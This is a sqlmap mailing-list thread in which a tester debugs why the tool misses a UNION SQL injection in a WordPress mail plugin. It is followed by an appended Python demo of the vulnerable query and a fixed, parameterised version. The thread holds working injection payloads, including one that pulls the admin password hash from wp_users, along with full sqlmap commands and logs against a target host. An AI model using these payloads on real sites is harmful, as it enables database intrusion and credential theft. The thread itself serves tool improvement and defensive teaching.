Aha, I got it:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql
-p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080
--technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5
--risk=3 -o
_
___ ___| |_____ ___ ___ {1.0-dev-180ede0}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program
[*] starting at 09:54:50
[09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
[09:54:50] [INFO] setting file for logging HTTP traffic
[09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been
disabled because of its incompatibility with HTTP(s) proxy
[09:54:50] [INFO] testing connection to the target URL
[09:54:50] [INFO] heuristics detected web page charset 'ascii'
[09:54:50] [WARNING] heuristic (basic) test shows that POST parameter
'tray' might not be injectable
[09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
[09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:54:51] [WARNING] reflective value(s) found and filtering out
[09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10
columns'
[09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
[09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random
number) - 1 to 10 columns' injectable
POST parameter 'tray' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 26 HTTP(s)
requests:
---
Parameter: tray (POST)
Type: UNION query
Title: MySQL UNION query (random number) - 1 column
Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT
CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
---
[09:55:02] [INFO] testing MySQL
[09:55:02] [INFO] confirming MySQL
[09:55:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[09:55:03] [INFO] fetched data logged to text files under
'/home/bperry/.sqlmap/output/172.31.16.26'
[*] shutting down at 09:55:03
bperry@ubuntu:~/tools/sqlmap$
On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bperry.volat...@gmail.com>
wrote:
>
> Sorry, one more thing to note, the following command gets very close to
> exploiting the injection:
>
> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t
> /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix="
> LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>
> The only problem is that the union-char is 'f', when I was hoping it would
> be 0x66. When I capture the request and replace 'f' with 0x66, the
> injection works. Looks like ' is a bad char.
>
> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bperry.volat...@gmail.com> wrote:
>>
>> Playing with the queries sqlmap sends a bit more:
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>
>> This results in a 0 being returned where the password hash was in the
>> successful injection:
>>
>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>> ^ injection result
>>
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>
>> This payload also results in a 0 being returned, not 'fdsa' as you would
>> expect.
>>
>> However, this payload does return 'fdsa'
>>
>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT
>> 1,1#&mid=1
>>
>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT
>> 1,1#[split]
>>
>>
>> Hope this helps.
>>
>>
>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <
>> bperry.volat...@gmail.com> wrote:
>>>
>>> Here is the console output. Attached is the traffic log in a zip:
>>>
>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5
>>> --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>> _
>>> ___ ___| |_____ ___ ___ {1.0-dev-180ede0}
>>> |_ -| . | | | .'| . |
>>> |___|_ |_|_|_|_|__,| _|
>>> |_| |_| http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by this
>>> program
>>>
>>> [*] starting at 08:56:27
>>>
>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>> [08:56:27] [INFO] flushing session file
>>> [08:56:27] [INFO] testing connection to the target URL
>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a
>>> couple of seconds
>>> [08:56:28] [INFO] target URL is stable
>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter
>>> 'tray' might not be injectable
>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause'
>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause (MySQL comment)'
>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>>> clause (Generic comment)'
>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause'
>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause (MySQL comment)'
>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING
>>> clause (Generic comment)'
>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING,
>>> ORDER BY or GROUP BY clause (RLIKE)'
>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (MAKE_SET - original value)'
>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (ELT - original value)'
>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace
>>> (bool*int - original value)'
>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter
>>> replace (original value)'
>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>> ORDER BY clauses'
>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and
>>> ORDER BY clauses (original value)'
>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY
>>> and ORDER BY clauses'
>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY
>>> and ORDER BY clauses'
>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or
>>> HAVING clause'
>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>> HAVING clause (EXTRACTVALUE)'
>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or
>>> HAVING clause (UPDATEXML)'
>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or
>>> HAVING clause (BIGINT UNSIGNED)'
>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or
>>> HAVING clause'
>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING
>>> clause'
>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>>> clause (EXTRACTVALUE)'
>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING
>>> clause (UPDATEXML)'
>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING
>>> clause (BIGINT UNSIGNED)'
>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING
>>> clause'
>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>> (EXTRACTVALUE)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace
>>> (UPDATEXML)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace
>>> (BIGINT UNSIGNED)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER
>>> BY clauses'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>>> BY clauses (EXTRACTVALUE)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER
>>> BY clauses (UPDATEXML)'
>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER
>>> BY clauses (BIGINT UNSIGNED)'
>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy
>>> query)'
>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND
>>> time-based blind (heavy query)' injectable
>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>> [08:58:26] [INFO] automatically extending ranges for UNION query
>>> injection technique tests as there is at least one other (potential)
>>> technique found
>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1
>>> columns
>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
>>> columns'
>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
>>> columns'
>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
>>> columns'
>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
>>> columns'
>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
>>> columns'
>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
>>> columns'
>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to
>>> 40 columns'
>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to
>>> 60 columns'
>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to
>>> 80 columns'
>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100
>>> columns'
>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to
>>> 100 columns'
>>> [08:58:54] [INFO] checking if the injection point on POST parameter
>>> 'tray' is a false positive
>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the
>>> others (if any)? [y/N] n
>>> sqlmap identified the following injection points with a total of 2049
>>> HTTP(s) requests:
>>> ---
>>> Parameter: tray (POST)
>>> Type: AND/OR time-based blind
>>> Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>> Payload: action=getMailMessage&tray=in_deleted AND
>>> 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>> ---
>>> [08:59:48] [INFO] testing MySQL
>>> [08:59:48] [WARNING] it is very important not to stress the network
>>> adapter during usage of time-based payloads to prevent potential errors
>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses
>>> (option '--time-sec')? [Y/n]
>>> [08:59:51] [INFO] confirming MySQL
>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response
>>> times
>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>> web server operating system: Linux Ubuntu
>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>> back-end DBMS: MySQL >= 5.0.0
>>> [08:59:53] [INFO] fetched data logged to text files under
>>> '/home/bperry/.sqlmap/output/172.31.16.26'
>>>
>>> [*] shutting down at 08:59:53
>>>
>>> bperry@ubuntu:~/tools/sqlmap$
>>>
>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
>>> miroslav.stam...@gmail.com> wrote:
>>>>
>>>> Hi.
>>>>
>>>> I don't see a reason why this form of UNION test would be any different
>>>> than the regular used by sqlmap. Can you please send me the traffic file
>>>> for such run (... --flush-session -t traffic.txt) along with console
>>>> output?
>>>>
>>>> Bye
>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bperry.volat...@gmail.com>
>>>> wrote:
>>>>
>>>>> Hello!
>>>>>
>>>>> Playing around with the following vulnerability:
>>>>>
>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>
>>>>>
>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1
>>>>> UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1'
>>>>> does result in a response from the server with the hash of the first user:
>>>>>
>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>>>>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>
>>>>>
>>>>> However, sqlmap only finds a time based injection. Looking at sqlmap
>>>>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>>>>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>>>>> CONCAT(blah, blah, blah) FROM blah).
>>>>>
>>>>> Just a thought!
>>>>>
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>>
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sqlmap-users@lists.sourceforge.net
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>
>>> --
>>> http://volatile-minds.blogspot.com -- blog
>>> http://www.volatileminds.net -- website
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
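Why the UNION payloads in the thread only surface their row once `LIMIT 1,1` is appended, and how the lookup should be written instead, as an added example that is not the plugin's code and not from the thread. It assumes the tray parameter is spliced into the WHERE clause as a bare expression and that the page renders only the first row of one selected column; it runs on SQLite, so `--` stands in for the MySQL `#` comment used in the thread.

```python
import sqlite3

# Constructed schema standing in for the plugin's tables: the thread does not
# show the real query, so this assumes 'tray' is spliced into WHERE as a bare
# expression and the page renders only the FIRST row of one selected column.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE mail (id INTEGER, in_deleted INTEGER, in_inbox INTEGER,
                           is_read INTEGER);
        INSERT INTO mail VALUES (1, 1, 0, 0);
        CREATE TABLE wp_users (ID INTEGER, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, '$P$constructed-example-hash');
    """)
    return con

def vulnerable_get_mail_message(con, tray, mid):
    # Assumed string concatenation; SQLite '--' replaces the MySQL '#' comment.
    sql = f"SELECT is_read FROM mail WHERE {tray} AND id = {int(mid)}"
    row = con.execute(sql).fetchone()          # app reads only the first row
    return row[0] if row else None

ALLOWED_TRAYS = {"in_deleted", "in_inbox"}     # hypothetical allow-list

def safe_get_mail_message(con, tray, mid):
    # A column name cannot be bound as a parameter, so it is allow-listed;
    # the numeric id is bound with a placeholder instead of formatted in.
    if tray not in ALLOWED_TRAYS:
        raise ValueError(f"unknown tray: {tray!r}")
    sql = f"SELECT is_read FROM mail WHERE {tray} = 1 AND id = ?"
    row = con.execute(sql, (mid,)).fetchone()
    return row[0] if row else None

UNION = "in_deleted UNION ALL SELECT user_pass FROM wp_users WHERE ID=1"

def demo():
    con = make_db()
    results = (
        vulnerable_get_mail_message(con, "in_deleted", 1),             # 0
        vulnerable_get_mail_message(con, UNION + " -- ", 1),           # 0: row 1 is the original's
        vulnerable_get_mail_message(con, UNION + " LIMIT 1,1 -- ", 1), # UNION row (offset 1)
        safe_get_mail_message(con, "in_deleted", 1),                   # 0
    )
    try:
        safe_get_mail_message(con, UNION + " LIMIT 1,1 -- ", 1)
        rejected = "accepted"
    except ValueError:
        rejected = "rejected"
    return results + (rejected,)

if __name__ == "__main__":
    print(demo())
```

The second call shows the thread's "0 where the hash should be": the UNION row does exist but sits behind the original row, which is all the page displays.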